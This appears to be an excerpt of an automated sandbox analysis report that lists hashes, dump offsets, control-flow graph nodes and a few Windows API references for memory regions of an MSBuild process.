                            • Opcode ID: 8882de563af2d4d29dce999ead201cda0083025fb0b3a29c784438f371168d39
                            • Instruction ID: 3c0b79bcd1bb2919797424185be62369d5513d3152213b53bc6886c97f5a650b
                            • Opcode Fuzzy Hash: 8882de563af2d4d29dce999ead201cda0083025fb0b3a29c784438f371168d39
                            • Instruction Fuzzy Hash: 07520374E05229CFCB68DF65C844BEEBBB6BF89301F1484A9D409A7251DB319E85CF60
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 058813538ee7f270c47cc7d3937ec7330a7a223600120a48eb014b9b28b8e2cf
                            • Instruction ID: f9adb374248d300bfe63e4f155695a2ab0fb41ecbc719347ee8f5b2c951ec4c6
                            • Opcode Fuzzy Hash: 058813538ee7f270c47cc7d3937ec7330a7a223600120a48eb014b9b28b8e2cf
                            • Instruction Fuzzy Hash: 46327C30A04301CFDB29DF29C488B7ABBF6BF85315F558869E546CB651DB35E881CB50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: dd97468dcbb6b44555a1b3186a048487150187688a784a717d383ab646e82863
                            • Instruction ID: d316d741ac65da64e187f70d01eb09fe1fb6b75e45bb963735cca7dc2a752146
                            • Opcode Fuzzy Hash: dd97468dcbb6b44555a1b3186a048487150187688a784a717d383ab646e82863
                            • Instruction Fuzzy Hash: 2B42CD74D05228CFDB69DF65C880BEDBBB2BB89300F1091EAC549A7290DB359E85DF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: bec3ca7ad9dfa73bb5126416823edb621b679220f9c92d2258f647997a0b140a
                            • Instruction ID: 209ecf89b0aa6cb2532e8e541163b53a1dc6ba3f0765b120f27f373b535d6aa0
                            • Opcode Fuzzy Hash: bec3ca7ad9dfa73bb5126416823edb621b679220f9c92d2258f647997a0b140a
                            • Instruction Fuzzy Hash: F342B1B4D05228CFDB24CFA5C984BDDFBB2BF89300F1085AAE409A7250DB755A85CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbc699cce19e9127547ecd562f90a30ff122f32a1714f3a758375a2d2ce52df4
                            • Instruction ID: fafde3a5e91290aa540e477a661159cfeb3ec032a9edd949e95eeb08e3ec9530
                            • Opcode Fuzzy Hash: cbc699cce19e9127547ecd562f90a30ff122f32a1714f3a758375a2d2ce52df4
                            • Instruction Fuzzy Hash: 46127334B002158FDB54DF69C494AAEBBF6FF88710B148169E90AEB365DB31EC41CB90
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: cbb9e8f9f7e1b7223aae4f98198c3c7adcc489fe879e5cb4a350b23900923f39
                            • Instruction ID: 31841f0afc71b5c888c367f302b60ec12160dfa2e06adade1e519573685c9747
                            • Opcode Fuzzy Hash: cbb9e8f9f7e1b7223aae4f98198c3c7adcc489fe879e5cb4a350b23900923f39
                            • Instruction Fuzzy Hash: 38F1A430B05325EBDB159F64984977E7AABFF88740F14842AF806D7398DB309C42CBA1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 8069b85fee1aa43e90eac20ef07194dadc54d0fd203275b58a2f71cb7c69d927
                            • Instruction ID: eb99c56f5ddf0e5d23b5ddd1c2c688901c142a057d8b042c9ca296459b0b0fb8
                            • Opcode Fuzzy Hash: 8069b85fee1aa43e90eac20ef07194dadc54d0fd203275b58a2f71cb7c69d927
                            • Instruction Fuzzy Hash: 1712CF74A052288FEB64DF29CD44BDABBBAFB49301F0484EAD40CA7251DB319E85CF51
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 18049e39ea8b29f8eb42a6f05074c1d4fbcd801970ae5d6667a7ea3795ba8aa8
                            • Instruction ID: adfa3f3a1b90e30730d5afd0721f800853c30d591453c5a3b165b7b39f446c6c
                            • Opcode Fuzzy Hash: 18049e39ea8b29f8eb42a6f05074c1d4fbcd801970ae5d6667a7ea3795ba8aa8
                            • Instruction Fuzzy Hash: F912E174E05228CFDB28DF65C944B9EFBB2BF49300F1495EAD409AB251DB349A85CF60
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: e42f0e2d1a44dfd68d30203c00af971576ee70ed8b24d42fd35c7f3b50b427d7
                            • Instruction ID: 7c35acf213e461000897b3411f4a887eee8307b5fbac60404012b204ee18b473
                            • Opcode Fuzzy Hash: e42f0e2d1a44dfd68d30203c00af971576ee70ed8b24d42fd35c7f3b50b427d7
                            • Instruction Fuzzy Hash: 58F1B131A04256CBCB15DF75C5502BDFBB2FF85300F24CA69D446AB242EB759A85CBA0
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: ffb56eb983f1de4d4d00b9284071117bf8b10f87868f011f3822e7ed35442608
                            • Instruction ID: 1a15e390f4900a75d18e31ddeb5a6f94099c3b165e1434c2ec77fdf7175052d2
                            • Opcode Fuzzy Hash: ffb56eb983f1de4d4d00b9284071117bf8b10f87868f011f3822e7ed35442608
                            • Instruction Fuzzy Hash: A702E370D01218CFDB24DFA9C990B9EBBB6FF89300F5085A9D549A7390DB359A85CF60
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528618280.0000000005990000.00000040.00000800.00020000.00000000.sdmp, Offset: 05990000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5990000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d353f9fe3fe39ab7ac97d9ae92f3b52051fc039035f19fc73168cee48ec3293
                            • Instruction ID: e4067897ff23d9cde36f169a1794a0bfd3312e1c0fa7987d4767e85454b4c964
                            • Opcode Fuzzy Hash: 1d353f9fe3fe39ab7ac97d9ae92f3b52051fc039035f19fc73168cee48ec3293
                            • Instruction Fuzzy Hash: 00027C35A14705CFDB29CFA9C484AAABBF6FF89300F148969E446DB761DB34E841CB50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: b5c4364d22ab97db81924f02efa5402d4bbfb4546646db604c34985e2b1897b7
                            • Instruction ID: 3a2d76418ac10b6259bc6887f4ad27b2998cdaa5658d19a32c7dcd93ac605d62
                            • Opcode Fuzzy Hash: b5c4364d22ab97db81924f02efa5402d4bbfb4546646db604c34985e2b1897b7
                            • Instruction Fuzzy Hash: EE126F74E05218CFDB64DFA9C984BDDBBB2BF89300F1091A9D849AB355DB309A85CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f7013b4a9b6dd1b61c2ff33f30d52721944bff77c1683e976173c6f461c7f4d7
                            • Instruction ID: 573b4a53992179c2d8738271bb07f9eecfdffaef6af5ee25618886d2dc751788
                            • Opcode Fuzzy Hash: f7013b4a9b6dd1b61c2ff33f30d52721944bff77c1683e976173c6f461c7f4d7
                            • Instruction Fuzzy Hash: 93D1AC30B006508FDB19DF79D8546AEBBF2AF89310B14856DE506DB3A1DF35EC068BA1
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: d7e266982756a5ce72d16a213fda139170c21fc953eea0ce214bf1b6173dce49
                            • Instruction ID: f0c0bc09b2130c707d5263acf157d19c3e784d7567c677360bbcc7faf5731b2b
                            • Opcode Fuzzy Hash: d7e266982756a5ce72d16a213fda139170c21fc953eea0ce214bf1b6173dce49
                            • Instruction Fuzzy Hash: 8EF1C074D01229CFDB68DF65C984BDDBBB2BB89300F1091EAD509A7291DB345E85CF60
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528458587.0000000005920000.00000040.00000800.00020000.00000000.sdmp, Offset: 05920000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_5920000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: f335300d3992631ca1130b50a5728473ea72118f691397a2d820307d6102b9f9
                            • Instruction ID: bcc63b80ad76a4f2f313722224f2d2b8103101436dc0cca4d6fdf8b1ad5a33e1
                            • Opcode Fuzzy Hash: f335300d3992631ca1130b50a5728473ea72118f691397a2d820307d6102b9f9
                            • Instruction Fuzzy Hash: 9AD15F70A013199FDB05DF68D880B9EBBF6FF88300F148569E409AB695DB31ED45CB91
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0b963699991bcfea6d6e1527b31f2f0062df78e6421b2a21b5e46a5c4f4440e1
                            • Instruction ID: b576873b040a4d3ddea089be458ff5a85fddf1e7378af84d15908596c4e2ec9a
                            • Opcode Fuzzy Hash: 0b963699991bcfea6d6e1527b31f2f0062df78e6421b2a21b5e46a5c4f4440e1
                            • Instruction Fuzzy Hash: 71E1B174E01219DFDB14DFA9C884AAEFBB6FF88300F148569E409AB255D734A982CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 40d980d7c31c8acfc5c28ece0a860ba1a1553e94b2fb65078ccf5865bc7d5848
                            • Instruction ID: 4eb4b1856ece16271919209754071671621336d4860ebf14a861d9cce2be8928
                            • Opcode Fuzzy Hash: 40d980d7c31c8acfc5c28ece0a860ba1a1553e94b2fb65078ccf5865bc7d5848
                            • Instruction Fuzzy Hash: C9B1E574E01218CFDB18DFA9D980A9EBBF2FF89300F248569D409AB354DB35A985CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1c3a093aa0d1054b4b789dda0f2bbf0201714ba4896e91d93e7431f69d888944
                            • Instruction ID: 700f595d1524de0c06ac920a543bd9b3970330e2558f1ba54ff43eee1774a899
                            • Opcode Fuzzy Hash: 1c3a093aa0d1054b4b789dda0f2bbf0201714ba4896e91d93e7431f69d888944
                            • Instruction Fuzzy Hash: 0BB17D74E002199FDB54CFA9C984AADFBF2BF48300F14D1AAE819A7351DB749A85CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 9947bc98aca9898d40328e4bd06fa8f98c81fa194d29479b19985387c99ceb3c
                            • Instruction ID: 4ec24b22a33eeb286ff901b152cbe22bada925a081773937ca43d014d0b59194
                            • Opcode Fuzzy Hash: 9947bc98aca9898d40328e4bd06fa8f98c81fa194d29479b19985387c99ceb3c
                            • Instruction Fuzzy Hash: 27A19275E052188FDB14CF6AD980ADEBBF2BF89300F14D1AAD409AB355EB309985CF40
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: c93d49dbcf7e2e12f9ca13b3350afe14ce9cebb83ec48f39a25bc1b13905c2f3
                            • Instruction ID: 52d98e98c7584ac4cb73e058b9df9d85aca36d431615895f8fbace648f562a87
                            • Opcode Fuzzy Hash: c93d49dbcf7e2e12f9ca13b3350afe14ce9cebb83ec48f39a25bc1b13905c2f3
                            • Instruction Fuzzy Hash: C1A17C74E05218DFDB54CFA9D980A9DFBF2BF89310F1491AAE809AB355DB309981CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1d865867c47496b9814ce1901d100e2bd1ae041250181d5aee2983eb214f4621
                            • Instruction ID: 2d899db4c9f7f3ae97fc24b41df580b05fc1dc1c824c48a438bfc3476cd94d50
                            • Opcode Fuzzy Hash: 1d865867c47496b9814ce1901d100e2bd1ae041250181d5aee2983eb214f4621
                            • Instruction Fuzzy Hash: 8DA1BD74D00318CFDB58CFA9D844AEDBBB6FF88300F20846AE819AB255DB355985CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 39f9fc6df7e34d3871e952b187e680065bdf5dde8b25dbba2ae2c07005ec3913
                            • Instruction ID: ea5b6101bd75d18c19f6d75c674b5991741b3ec38a8e34434574f61d6220f7f0
                            • Opcode Fuzzy Hash: 39f9fc6df7e34d3871e952b187e680065bdf5dde8b25dbba2ae2c07005ec3913
                            • Instruction Fuzzy Hash: 4E91B578E00318DFDB05EFA9D854B9EBBB2FF88701F148029E8056B398DB756942DB51
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 522eb7c99705027e27a58b5ea5889d113d72a12a6c4ec83186977ab3dc733545
                            • Instruction ID: eb530041734878060ab2aeb75a82d0dc55d133a7e83c27a70ece2c4d8ca7490c
                            • Opcode Fuzzy Hash: 522eb7c99705027e27a58b5ea5889d113d72a12a6c4ec83186977ab3dc733545
                            • Instruction Fuzzy Hash: DF919174E05218DFDB54DFA9D884ADDFBB2BF89300F24816AE819AB355DB309941CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 1104f2d069acf50e242e54bcaa754ed6bb1462a95a31fac22abbe1b3834fb251
                            • Instruction ID: 10e4361ac8650d3abf628699497498c1ff2749371cd2959f73bb7e62ea9da552
                            • Opcode Fuzzy Hash: 1104f2d069acf50e242e54bcaa754ed6bb1462a95a31fac22abbe1b3834fb251
                            • Instruction Fuzzy Hash: 0EA1A3B4E012188FEB28DF65D9547DEFBB2BF88304F1081A9E409AB394DB755A85CF50
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: da4a01635a6455d88d5e65f5e5206fddaa538a9288000c5319f4340bb1fbe212
                            • Instruction ID: e8cd4a2f432153d06a5d46a035b025ca31a62168558d26372de557bb787b7b65
                            • Opcode Fuzzy Hash: da4a01635a6455d88d5e65f5e5206fddaa538a9288000c5319f4340bb1fbe212
                            • Instruction Fuzzy Hash: 44719D74D05218CFDB14CFA9C884AEDBBB2FF89305F28906AD409BB254DB359986CF10
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 23b791a81e1c98e213f936553de08d15fd16eefb6043d523500c7519898ae9b5
                            • Instruction ID: 3d22f9c5181e89c34f08d6761ca21c0cbe181e9c11420c99a9eedd2d3531f49e
                            • Opcode Fuzzy Hash: 23b791a81e1c98e213f936553de08d15fd16eefb6043d523500c7519898ae9b5
                            • Instruction Fuzzy Hash: 84711475D05348DFDB05DFA5D894ADEBFB2FF89300F24806AE815AB265DB305806CB51
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 0e0bd76069d74b0edfb02e1e4d8296837f1cf53d092cc69b06d1ef37b7724068
                            • Instruction ID: e16a02449185073c8659f5b60a794cb3e7aa4573f3d8ee65891ac50a46b828a1
                            • Opcode Fuzzy Hash: 0e0bd76069d74b0edfb02e1e4d8296837f1cf53d092cc69b06d1ef37b7724068
                            • Instruction Fuzzy Hash: A351AFB4D05208CBDB14CFAAD5806EEFBF2BF89304F249529D815BB354DB35A942CB54
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 37d69b7fe3f881b7b78f50fdf57f17152d7f13bb4c261e20bb1ed0cc17f8b22c
                            • Instruction ID: 8f31a157062bd768bccbbab9ca3902dfffaa5c16112b9f9b9415c8a4164299ae
                            • Opcode Fuzzy Hash: 37d69b7fe3f881b7b78f50fdf57f17152d7f13bb4c261e20bb1ed0cc17f8b22c
                            • Instruction Fuzzy Hash: 3541BBB1E016299BEB69CF66CD417DAF6F7AFC8300F04C0FA941CA7264DA741A858F10
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 3dfb5cd0977a4eeeeee10d73e4e1011d331db2973f741ac429c86e2d94121ae9
                            • Instruction ID: d2a391efc7c62c9fb3f9d5f17224d5247c223e30c9475964ce44aa5fbabca8fd
                            • Opcode Fuzzy Hash: 3dfb5cd0977a4eeeeee10d73e4e1011d331db2973f741ac429c86e2d94121ae9
                            • Instruction Fuzzy Hash: 6E2174B2E016589BEB18CFABD8446DDFAF3AFC8300F14C53AD819AA264DB744546CA54
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID:
                            • String ID:
                            • API String ID:
                            • Opcode ID: 706113e5aab9269fc4ed57bd2588526cc14e4bd6b4f3487b221d4744a68e0b17
                            • Instruction ID: 7d24bcd213196fccf3d63296dbc6e2910a40794fe8b260a600a38711a9758430
                            • Opcode Fuzzy Hash: 706113e5aab9269fc4ed57bd2588526cc14e4bd6b4f3487b221d4744a68e0b17
                            • Instruction Fuzzy Hash: 522195B5E01649DBDB18CFAAD5806DEFBF2BF89300F14D02AE419AB254EB3459468B50

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 135 eb5690-eb56d0 136 eb56d2 135->136 137 eb56d7-eb5702 135->137 136->137 141 eb570d-eb5715 137->141 142 eb571f-eb751c PerfStartProviderEx 141->142 400 eb7527-eb752d 142->400 401 eb7539-eb8acb 400->401
                            APIs
                            • PerfStartProviderEx.KERNELBASE ref: 00EB6177
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: PerfProviderStart
                            • String ID:
                            • API String ID: 1077581468-0
                            • Opcode ID: 4e6116de2a4ba140907a6c2c3c089e231a3375fdbc7b20183ed1fbd593a0bfb5
                            • Instruction ID: 0d0da0687fbe8fa11d382ef249198fa8b7b7748aec73f48284077214ba9c4ec7
                            • Opcode Fuzzy Hash: 4e6116de2a4ba140907a6c2c3c089e231a3375fdbc7b20183ed1fbd593a0bfb5
                            • Instruction Fuzzy Hash: 6D639B78A0621ACFCB65EF34D990E9AB7B2FB49301F6045D9D8096B358D7329E81DF40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 617 eb56b0-eb56d0 618 eb56d2 617->618 619 eb56d7-eb752d PerfStartProviderEx 617->619 618->619 883 eb7539-eb8acb 619->883
                            APIs
                            • PerfStartProviderEx.KERNELBASE ref: 00EB6177
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: PerfProviderStart
                            • String ID:
                            • API String ID: 1077581468-0
                            • Opcode ID: edf2bd34081b74eaf3454afd7fd400010ada969fc37adc1173e85fe85333da85
                            • Instruction ID: 02f853ea8da1789c0f8aaac7c3385f8883d6bcf630362018deef8a5692ac5481
                            • Opcode Fuzzy Hash: edf2bd34081b74eaf3454afd7fd400010ada969fc37adc1173e85fe85333da85
                            • Instruction Fuzzy Hash: 15639B78A0621ACFCB65EF34D990E9AB7B2FB49301F6045D9D8096B358D7329E81DF40

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1099 ebcfb0-ebd098 DuplicateHandle 1101 ebd09a-ebd0a0 1099->1101 1102 ebd0a1-ebd0ef 1099->1102 1101->1102
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD088
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID: buz
                            • API String ID: 3793708945-3044919918
                            • Opcode ID: 1fe1c206d6f46c095ec4669dbb3763cc77509084766a12823c99395b0d4c2bd0
                            • Instruction ID: 3ab217ed92cc9803eed7b53f2994d47cb56d7be54c2e9da810049532b6ed3764
                            • Opcode Fuzzy Hash: 1fe1c206d6f46c095ec4669dbb3763cc77509084766a12823c99395b0d4c2bd0
                            • Instruction Fuzzy Hash: AC419BB9D042589FCF00DFA9D884AEEFBF1BB1A310F14A02AE814B7250D3759955DF64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1106 ebcfb8-ebd098 DuplicateHandle 1108 ebd09a-ebd0a0 1106->1108 1109 ebd0a1-ebd0ef 1106->1109 1108->1109
                            APIs
                            • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00EBD088
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1522737510.0000000000EB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EB0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_eb0000_MSBuild.jbxd
                            Similarity
                            • API ID: DuplicateHandle
                            • String ID: buz
                            • API String ID: 3793708945-3044919918
                            • Opcode ID: 84cbfcd88d3368ef2b1b8273dc06245ad30d5231a10fd192a583012674db1b20
                            • Instruction ID: abcd80a8ad45be9e5df7ed40890bad286ca7afdca81401d37a4359612edf16e3
                            • Opcode Fuzzy Hash: 84cbfcd88d3368ef2b1b8273dc06245ad30d5231a10fd192a583012674db1b20
                            • Instruction Fuzzy Hash: 91419BB9D042589FCF00CFA9D880AEEFBF1BB09310F14A02AE814B7250D375A945DF64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1113 59d2378-59d23c0 1114 59d23c8-59d2447 RtlCreateHeap 1113->1114 1115 59d2449-59d244f 1114->1115 1116 59d2450-59d2494 1114->1116 1115->1116
                            APIs
                            • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 059D2437
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID: buz
                            • API String ID: 10892065-3044919918
                            • Opcode ID: 0cbd290168ff29c893e45b9ea86e05c438eabe8f59c1b0afbb6d4ace5b0263c0
                            • Instruction ID: 6ab2405454888a301da3a40c71feac559e6350d10fc14fe604c3a51bec0df289
                            • Opcode Fuzzy Hash: 0cbd290168ff29c893e45b9ea86e05c438eabe8f59c1b0afbb6d4ace5b0263c0
                            • Instruction Fuzzy Hash: 134177B8D012599FCF00CFA9D984A9EFBF1BB49310F24A02AE819B7310D335A945CF64

                            Control-flow Graph

                            • Executed
                            • Not Executed
                            control_flow_graph 1120 59d2380-59d2447 RtlCreateHeap 1122 59d2449-59d244f 1120->1122 1123 59d2450-59d2494 1120->1123 1122->1123
                            APIs
                            • RtlCreateHeap.NTDLL(?,?,?,?,?,?), ref: 059D2437
                            Strings
                            Memory Dump Source
                            • Source File: 00000003.00000002.1528784054.00000000059D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 059D0000, based on PE: false
                            Joe Sandbox IDA Plugin
                            • Snapshot File: hcaresult_3_2_59d0000_MSBuild.jbxd
                            Similarity
                            • API ID: CreateHeap
                            • String ID: buz
